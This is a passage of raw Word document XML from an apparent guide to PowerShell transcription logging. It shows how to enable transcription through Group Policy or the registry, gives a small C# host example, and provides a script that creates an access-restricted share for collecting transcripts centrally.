        <w:t>the account being impersonated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002719DE" w:rsidRDefault="0083216C" w:rsidP="005859FB">
      <w:r>
        <w:t xml:space="preserve">When it comes to transcript content, </w:t>
      </w:r>
      <w:r w:rsidR="00252ACB">
        <w:t xml:space="preserve">PowerShell now transcribes </w:t>
      </w:r>
      <w:r w:rsidR="00517596">
        <w:t xml:space="preserve">(what it can) of console commands that manipulate the </w:t>
      </w:r>
      <w:r w:rsidR="00415F5F">
        <w:t>console buffer directly, and can now be enabled in ho</w:t>
      </w:r>
      <w:r w:rsidR="000F7285">
        <w:t>sts such as the PowerShell ISE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204F73" w:rsidRDefault="00204F73" w:rsidP="005859FB">
      <w:r>
        <w:t xml:space="preserve">If you want to more directly associate commands with their output for potential later analysis, use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00204F73">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–IncludeInvocationHeader</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter. This adds an additional header for each command that is invoked:</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Command start time: 20150403145336</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PS C:\temp&gt; 1+1</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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050638A" w:rsidRPr="0050638A" w:rsidRDefault="0050638A" w:rsidP="0050638A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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Command start time: 20150403145344</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PS C:\temp&gt; Get-Process -id $pid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050638A" w:rsidRPr="0050638A" w:rsidRDefault="0050638A" w:rsidP="0050638A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0050638A"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  ------    -----      ----- -----   ------     -- -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00204F73" w:rsidRPr="0050638A" w:rsidRDefault="0050638A" w:rsidP="0050638A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0050638A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    625      58   100096     101796   760    10.28  21816 powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00371C75" w:rsidRDefault="00AB59F0" w:rsidP="00203C5D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00371C75">
        <w:t xml:space="preserve">To enable automatic transcription, </w:t>
      </w:r>
      <w:r w:rsidR="001E53DF">
        <w:t xml:space="preserve">enable the ‘Turn on PowerShell Transcription’ feature in Group Policy through </w:t>
      </w:r>
      <w:r w:rsidR="001E53DF" w:rsidRPr="001E53DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Windows Components -&gt; Administrative Templates -&gt; Windows PowerShell</w:t>
      </w:r>
      <w:r w:rsidR="001E53DF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009D411D">
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="00984FEC">
        <w:t>automation, the configuration settings are stored under</w:t>
      </w:r>
      <w:r w:rsidR="00203C5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00203C5D">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription</w:t>
      </w:r>
      <w:r w:rsidR="000038A3">
        <w:t>. The following PowerShell functions let you enable and disable the system-wide transcription policies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00203C5D" w:rsidRPr="00203C5D" w:rsidRDefault="00203C5D" w:rsidP="00203C5D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>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Enable-PSTranscription</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BFFF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CmdletBinding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>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param</w:t>
      </w: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$OutputDirectory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>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8080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Switch</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$IncludeInvocationHeader</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6400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>## Ensure the base path exists</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"HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription"</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A9A9A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$null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6400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>## Enable transcription</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EnableTranscripting</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00080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</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6400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>## Set the output directory</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$PSCmdlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MyInvocation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BoundParameters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ContainsKey(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"OutputDirectory"</w:t>
      </w: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OutputDirectory</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$OutputDirectory</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6400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>## Set the invocation header</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$IncludeInvocationHeader</w:t>
      </w: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sidR="00482E00">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>InvocationHeader</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00080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</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Disable-PSTranscription</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Remove-Item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription</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000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-Recurse</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203C5D" w:rsidRDefault="00203C5D" w:rsidP="00203C5D">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5859FB" w:rsidRDefault="00214DCA" w:rsidP="00837C1C">
      <w:r>
        <w:t xml:space="preserve">When enabled system-wide, PowerShell transcription even </w:t>
      </w:r>
      <w:r w:rsidR="00837C1C">
        <w:t xml:space="preserve">includes emulated transcription for hosts that </w:t>
      </w:r>
      <w:r w:rsidR="00E10645">
        <w:t>don’t even have an interface – such as this example C# program:</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System;</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System.Management.Automation;</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IgnorantTranscriber</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Program</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Main(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>[] args)</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processes = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>.Create().AddCommand(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"Get-Process"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>).</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AddParameter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"Name"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"*e*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>).Invoke();</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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"You have "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> + processes.Count +</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 processes with 'e' in the name!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>);</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F4B18" w:rsidRDefault="007F4B18" w:rsidP="007F4B18">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F4B18" w:rsidRDefault="007F4B18" w:rsidP="007F4B18">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F4B18" w:rsidRDefault="00A11439" w:rsidP="00837C1C">
      <w:r>
        <w:t>When you run it, the logged content emulates what you might have seen:</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PS&gt;CommandInvocation(Get-Process): "Get-Process"</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&gt;&gt; ParameterBinding(Get-Process): name="Name"; value="*e*"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B6D7F" w:rsidRPr="009B6D7F" w:rsidRDefault="009B6D7F" w:rsidP="009B6D7F">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName</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    -----      ----- -----   ------     -- -----------</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135      11     2496       7716  4096            2548 Acmengine</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2451     121    63952     188004  4096    45.80   1516 explorer</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0       0        0          4     0               0 Idle</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254      22    38132      36248   229     0.64   2556 IgnorantTranscriber</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452      53    93164      64664  4096            1756 MsMpEng</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147      10     1872      12524  4096     0.08   3784 OpenWith</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658      33    80680      97852  4096     3.61   1120 powershell</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486      30    74876      89780  4096     2.64   2060 powershell</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277      10     3452       8696  4096             536 services</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148      12     3256       9840  4096            2608 sysparse</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885       0      120        136     3               4 System</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B6D7F" w:rsidRPr="009B6D7F" w:rsidRDefault="009B6D7F" w:rsidP="009B6D7F">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B6D7F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    239      18     3268      12060  4096     0.33   2896 taskhostex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B6D7F" w:rsidRPr="009B6D7F" w:rsidRDefault="009B6D7F" w:rsidP="009B6D7F">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B33126" w:rsidRDefault="00341BE6" w:rsidP="005C5B69">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="002C3571" w:rsidRPr="002C3571">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>OutputDirectory</w:t>
      </w:r>
      <w:r w:rsidR="002C3571">
        <w:t xml:space="preserve"> setting </w:t>
      </w:r>
      <w:r w:rsidR="00405385">
        <w:t>let</w:t>
      </w:r>
      <w:r w:rsidR="005822B9">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00405385">
        <w:t xml:space="preserve"> you </w:t>
      </w:r>
      <w:r w:rsidR="002C3571">
        <w:t xml:space="preserve">collect transcripts to a central location </w:t>
      </w:r>
      <w:r w:rsidR="00143925">
        <w:t xml:space="preserve">(UNC path) </w:t>
      </w:r>
      <w:r w:rsidR="001E0F2F">
        <w:t>for later review.</w:t>
      </w:r>
      <w:r w:rsidR="00DF352C">
        <w:t xml:space="preserve"> If </w:t>
      </w:r>
      <w:r w:rsidR="00AA3B14">
        <w:t xml:space="preserve">you implement </w:t>
      </w:r>
      <w:r w:rsidR="00DF352C">
        <w:t xml:space="preserve">this policy, ensure that access to the central share </w:t>
      </w:r>
      <w:r w:rsidR="003A3577">
        <w:t>is limited to</w:t>
      </w:r>
      <w:r w:rsidR="00B33126">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C57879">
        <w:t>prevent users from reading previously-written transcripts. The following PowerShell script create</w:t>
      </w:r>
      <w:r w:rsidR="003229A5">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C57879">
        <w:t xml:space="preserve"> a “Transcripts” SMB share on a server that follows this best practice.</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md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c:\Transcripts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Kill all inherited permissions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Get-Acl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c:\Transcripts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color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SetAccessRuleProtection(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$true</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</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Grant Administrators full control</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$administrators</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8080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.Security.Principal.NTAccount</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"Administrators"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lastRenderedPageBreak/>
        <w:t>$permission</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$administrators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"FullControl"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ObjectInherit,ContainerInherit"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"None"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Allow"</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$accessRule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New-Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.Security.AccessControl.FileSystemAccessRule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$permission</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color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AddAccessRule(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$accessRule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</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Grant everyone else Write and ReadAttributes. This prevents users from listing</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transcripts from other machines on the domain.</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$everyone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8080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.Security.Principal.NTAccount</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"Everyone"</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$permission</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$everyone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Write,ReadAttributes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ObjectInherit,ContainerInherit"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"None"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
